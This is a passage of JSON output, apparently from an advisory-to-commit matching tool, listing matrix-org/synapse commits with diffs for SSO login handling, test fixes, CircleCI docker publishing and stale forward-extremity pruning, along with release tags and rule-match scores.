await grandfather_existing_users()", - "+ if user_id:", - " # Future logins should also match this user ID.", - " await self._store.record_user_external_id(", - "- auth_provider_id, remote_user_id, previously_registered_user_id", - "+ auth_provider_id, remote_user_id, user_id", - " )", - "- return previously_registered_user_id", - " # Otherwise, generate a new user.", - "- attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", - "- user_id = await self._register_mapped_user(", - "- attributes, auth_provider_id, remote_user_id, user_agent, ip_address,", - "- )", - "- return user_id", - "+ if not user_id:", - "+ attributes = await self._call_attribute_mapper(sso_to_matrix_id_mapper)", - "+ user_id = await self._register_mapped_user(", - "+ attributes,", - "+ auth_provider_id,", - "+ remote_user_id,", - "+ request.get_user_agent(\"\"),", - "+ request.getClientIP(),", - "+ )", - "+", - "+ await self._auth_handler.complete_sso_login(", - "+ user_id, request, client_redirect_url, extra_login_attributes", - "+ )", - "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", - "index 69927cf6b..548038214 100644", - "--- a/tests/handlers/test_saml.py", - "+++ b/tests/handlers/test_saml.py", - "@@ -133,3 +133,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user:test\", request, \"redirect_uri\"", - "+ \"@test_user:test\", request, \"redirect_uri\", None", - " )", - "@@ -159,3 +159,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user:test\", request, \"\"", - "+ \"@test_user:test\", request, \"\", None", - " )", - "@@ -168,3 +168,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user:test\", request, \"\"", - "+ \"@test_user:test\", request, \"\", None", - " )", - "@@ -216,3 +216,3 @@ class SamlHandlerTestCase(HomeserverTestCase):", - " auth_handler.complete_sso_login.assert_called_once_with(", - "- \"@test_user1:test\", request, \"\"", - "+ \"@test_user1:test\", request, \"\", None", - " )" - ], - "changed_files": [ - "changelog.d/8941.feature", - "synapse/handlers/oidc_handler.py", - "synapse/handlers/saml_handler.py", - "synapse/handlers/sso.py", - "tests/handlers/test_saml.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8941": "Implement a username picker for synapse #8942", - "8876": "Support multiple SSO identity providers during login/UIA flow #8927 Push login completion down into SsoHandler #8941 Implement a username picker for synapse #8942" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8941, 8941", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8941, 8876", - "relevance": 2 - } - ] - }, - { - "commit_id": "c9c1c9d82f190abc2f1254f75fe42bf29eff08e1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608220000, - "hunks": 5, - "message": "Fix `UsersListTestCase` (#8964)", - "diff": [ - "diff --git a/changelog.d/8964.bugfix b/changelog.d/8964.bugfix", - "new file mode 100644", - "index 000000000..295933d6c", - "--- /dev/null", - "+++ b/changelog.d/8964.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug where deactivated users appeared in the user directory when their profile information was updated.", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index 9d6ef0251..9b2e4765f 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -491,5 +491,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token)", - "@@ -542,3 +540,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - " url = self.url + \"?%s=%s\" % (search_field, search_term,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1028,3 +1026,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -1046,3 +1044,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\"," - ], - "changed_files": [ - "changelog.d/8964.bugfix", - "tests/rest/admin/test_user.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8964": "Clean up tox.ini #8963" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8964, 8964", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8964", - "relevance": 2 - } - ] - }, - { - "commit_id": "dc016c66ae228fc6496de35928ea3096cba80267", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607619629, - "hunks": 3, - "message": "Don't publish `latest` docker image until all archs are built (#8909)", - "diff": [ - "diff --git a/.circleci/config.yml b/.circleci/config.yml", - "index 088da5573..375a7f7b0 100644", - "--- a/.circleci/config.yml", - "+++ b/.circleci/config.yml", - "@@ -9,2 +9,4 @@ jobs:", - " - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", - "+ # for release builds, we want to get the amd64 image out asap, so first", - "+ # we do an amd64-only build, before following up with a multiarch build.", - " - docker_build:", - "@@ -23,5 +25,4 @@ jobs:", - " - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:latest", - "- platforms: linux/amd64", - "+ # for `latest`, we don't want the arm images to disappear, so don't update the tag", - "+ # until all of the platforms are built.", - " - docker_build:", - "diff --git a/changelog.d/8909.misc b/changelog.d/8909.misc", - "new file mode 100644", - "index 000000000..b45972f0f", - "--- /dev/null", - "+++ b/changelog.d/8909.misc", - "@@ -0,0 +1 @@", - "+Don't publish `latest` docker image until all archs are built." - ], - "changed_files": [ - ".circleci/config.yml", - "changelog.d/8909.misc" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8909": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8909, 8909", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8909", - "relevance": 2 - } - ] - }, - { - "commit_id": "70586aa63eaf129505324976fb092cb3ad327590", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608284958, - "hunks": 18, - "message": "Try and drop stale extremities. (#8929) If we see stale extremities while persisting events, and notice that they don't change the result of state resolution, we drop them.", - "diff": [ - "diff --git a/changelog.d/8929.misc b/changelog.d/8929.misc", - "new file mode 100644", - "index 000000000..157018b6a", - "--- /dev/null", - "+++ b/changelog.d/8929.misc", - "@@ -0,0 +1 @@", - "+Automatically drop stale forward-extremities under some specific conditions.", - "diff --git a/synapse/api/constants.py b/synapse/api/constants.py", - "index 1932df83b..565a8cd76 100644", - "--- a/synapse/api/constants.py", - "+++ b/synapse/api/constants.py", - "@@ -97,2 +97,4 @@ class EventTypes:", - "+ Dummy = \"org.matrix.dummy_event\"", - "+", - "diff --git a/synapse/handlers/message.py b/synapse/handlers/message.py", - "index 2b8aa9443..9dfeab09c 100644", - "--- a/synapse/handlers/message.py", - "+++ b/synapse/handlers/message.py", - "@@ -1263,3 +1263,3 @@ class EventCreationHandler:", - " {", - "- \"type\": \"org.matrix.dummy_event\",", - "+ \"type\": EventTypes.Dummy,", - " \"content\": {},", - "diff --git a/synapse/storage/persist_events.py b/synapse/storage/persist_events.py", - "index 70e636b0b..61fc49c69 100644", - "--- a/synapse/storage/persist_events.py", - "+++ b/synapse/storage/persist_events.py", - "@@ -33,3 +33,10 @@ from synapse.storage.databases import Databases", - " from synapse.storage.databases.main.events import DeltaState", - "-from synapse.types import Collection, PersistedEventPosition, RoomStreamToken, StateMap", - "+from synapse.storage.databases.main.events_worker import EventRedactBehaviour", - "+from synapse.types import (", - "+ Collection,", - "+ PersistedEventPosition,", - "+ RoomStreamToken,", - "+ StateMap,", - "+ get_domain_from_id,", - "+)", - " from synapse.util.async_helpers import ObservableDeferred", - "@@ -70,2 +77,17 @@ stale_forward_extremities_counter = Histogram(", - "+state_resolutions_during_persistence = Counter(", - "+ \"synapse_storage_events_state_resolutions_during_persistence\",", - "+ \"Number of times we had to do state res to calculate new current state\",", - "+)", - "+", - "+potential_times_prune_extremities = Counter(", - "+ \"synapse_storage_events_potential_times_prune_extremities\",", - "+ \"Number of times we might be able to prune extremities\",", - "+)", - "+", - "+times_pruned_extremities = Counter(", - "+ \"synapse_storage_events_times_pruned_extremities\",", - "+ \"Number of times we were actually be able to prune extremities\",", - "+)", - "+", - "@@ -456,3 +478,11 @@ class EventsPersistenceStorage:", - " )", - "- current_state, delta_ids = res", - "+ current_state, delta_ids, new_latest_event_ids = res", - "+", - "+ # there should always be at least one forward extremity.", - "+ # (except during the initial persistence of the send_join", - "+ # results, in which case there will be no existing", - "+ # extremities, so we'll `continue` above and skip this bit.)", - "+ assert new_latest_event_ids, \"No forward extremities left!\"", - "+", - "+ new_forward_extremeties[room_id] = new_latest_event_ids", - "@@ -575,5 +605,5 @@ class EventsPersistenceStorage:", - " events_context: List[Tuple[EventBase, EventContext]],", - "- old_latest_event_ids: Iterable[str],", - "- new_latest_event_ids: Iterable[str],", - "- ) -> Tuple[Optional[StateMap[str]], Optional[StateMap[str]]]:", - "+ old_latest_event_ids: Set[str],", - "+ new_latest_event_ids: Set[str],", - "+ ) -> Tuple[Optional[StateMap[str]], Optional[StateMap[str]], Set[str]]:", - " \"\"\"Calculate the current state dict after adding some new events to", - "@@ -582,12 +612,12 @@ class EventsPersistenceStorage:", - " Args:", - "- room_id (str):", - "+ room_id:", - " room to which the events are being added. Used for logging etc", - "- events_context (list[(EventBase, EventContext)]):", - "+ events_context:", - " events and contexts which are being added to the room", - "- old_latest_event_ids (iterable[str]):", - "+ old_latest_event_ids:", - " the old forward extremities for the room.", - "- new_latest_event_ids (iterable[str]):", - "+ new_latest_event_ids :", - " the new forward extremities for the room.", - "@@ -595,5 +625,11 @@ class EventsPersistenceStorage:", - " Returns:", - "- Returns a tuple of two state maps, the first being the full new current", - "- state and the second being the delta to the existing current state.", - "- If both are None then there has been no change.", - "+ Returns a tuple of two state maps and a set of new forward", - "+ extremities.", - "+", - "+ The first state map is the full new current state and the second", - "+ is the delta to the existing current state. If both are None then", - "+ there has been no change.", - "+", - "+ The function may prune some old entries from the set of new", - "+ forward extremities if it's safe to do so.", - "@@ -674,3 +710,3 @@ class EventsPersistenceStorage:", - " if old_state_groups == new_state_groups:", - "- return None, None", - "+ return None, None, new_latest_event_ids", - "@@ -691,3 +727,3 @@ class EventsPersistenceStorage:", - " new_state = state_groups_map.get(new_state_group)", - "- return new_state, delta_ids", - "+ return new_state, delta_ids, new_latest_event_ids", - "@@ -703,3 +739,3 @@ class EventsPersistenceStorage:", - " # state is.", - "- return state_groups_map[new_state_groups.pop()], None", - "+ return state_groups_map[new_state_groups.pop()], None, new_latest_event_ids", - "@@ -736,3 +772,135 @@ class EventsPersistenceStorage:", - "- return res.state, None", - "+ state_resolutions_during_persistence.inc()", - "+", - "+ # If the returned state matches the state group of one of the new", - "+ # forward extremities then we check if we are able to prune some state", - "+ # extremities.", - "+ if res.state_group and res.state_group in new_state_groups:", - "+ new_latest_event_ids = await self._prune_extremities(", - "+ room_id,", - "+ new_latest_event_ids,", - "+ res.state_group,", - "+ event_id_to_state_group,", - "+ events_context,", - "+ )", - "+", - "+ return res.state, None, new_latest_event_ids", - "+", - "+ async def _prune_extremities(", - "+ self,", - "+ room_id: str,", - "+ new_latest_event_ids: Set[str],", - "+ resolved_state_group: int,", - "+ event_id_to_state_group: Dict[str, int],", - "+ events_context: List[Tuple[EventBase, EventContext]],", - "+ ) -> Set[str]:", - "+ \"\"\"See if we can prune any of the extremities after calculating the", - "+ resolved state.", - "+ \"\"\"", - "+ potential_times_prune_extremities.inc()", - "+", - "+ # We keep all the extremities that have the same state group, and", - "+ # see if we can drop the others.", - "+ new_new_extrems = {", - "+ e", - "+ for e in new_latest_event_ids", - "+ if event_id_to_state_group[e] == resolved_state_group", - "+ }", - "+", - "+ dropped_extrems = set(new_latest_event_ids) - new_new_extrems", - "+", - "+ logger.debug(\"Might drop extremities: %s\", dropped_extrems)", - "+", - "+ # We only drop events from the extremities list if:", - "+ # 1. we're not currently persisting them;", - "+ # 2. they're not our own events (or are dummy events); and", - "+ # 3. they're either:", - "+ # 1. over N hours old and more than N events ago (we use depth to", - "+ # calculate); or", - "+ # 2. we are persisting an event from the same domain and more than", - "+ # M events ago.", - "+ #", - "+ # The idea is that we don't want to drop events that are \"legitimate\"", - "+ # extremities (that we would want to include as prev events), only", - "+ # \"stuck\" extremities that are e.g. due to a gap in the graph.", - "+ #", - "+ # Note that we either drop all of them or none of them. If we only drop", - "+ # some of the events we don't know if state res would come to the same", - "+ # conclusion.", - "+", - "+ for ev, _ in events_context:", - "+ if ev.event_id in dropped_extrems:", - "+ logger.debug(", - "+ \"Not dropping extremities: %s is being persisted\", ev.event_id", - "+ )", - "+ return new_latest_event_ids", - "+", - "+ dropped_events = await self.main_store.get_events(", - "+ dropped_extrems,", - "+ allow_rejected=True,", - "+ redact_behaviour=EventRedactBehaviour.AS_IS,", - "+ )", - "+", - "+ new_senders = {get_domain_from_id(e.sender) for e, _ in events_context}", - "+", - "+ one_day_ago = self._clock.time_msec() - 24 * 60 * 60 * 1000", - "+ current_depth = max(e.depth for e, _ in events_context)", - "+ for event in dropped_events.values():", - "+ # If the event is a local dummy event then we should check it", - "+ # doesn't reference any local events, as we want to reference those", - "+ # if we send any new events.", - "+ #", - "+ # Note we do this recursively to handle the case where a dummy event", - "+ # references a dummy event that only references remote events.", - "+ #", - "+ # Ideally we'd figure out a way of still being able to drop old", - "+ # dummy events that reference local events, but this is good enough", - "+ # as a first cut.", - "+ events_to_check = [event]", - "+ while events_to_check:", - "+ new_events = set()", - "+ for event_to_check in events_to_check:", - "+ if self.is_mine_id(event_to_check.sender):", - "+ if event_to_check.type != EventTypes.Dummy:", - "+ logger.debug(\"Not dropping own event\")", - "+ return new_latest_event_ids", - "+ new_events.update(event_to_check.prev_event_ids())", - "+", - "+ prev_events = await self.main_store.get_events(", - "+ new_events,", - "+ allow_rejected=True,", - "+ redact_behaviour=EventRedactBehaviour.AS_IS,", - "+ )", - "+ events_to_check = prev_events.values()", - "+", - "+ if (", - "+ event.origin_server_ts < one_day_ago", - "+ and event.depth < current_depth - 100", - "+ ):", - "+ continue", - "+", - "+ # We can be less conservative about dropping extremities from the", - "+ # same domain, though we do want to wait a little bit (otherwise", - "+ # we'll immediately remove all extremities from a given server).", - "+ if (", - "+ get_domain_from_id(event.sender) in new_senders", - "+ and event.depth < current_depth - 20", - "+ ):", - "+ continue", - "+", - "+ logger.debug(", - "+ \"Not dropping as too new and not in new_senders: %s\", 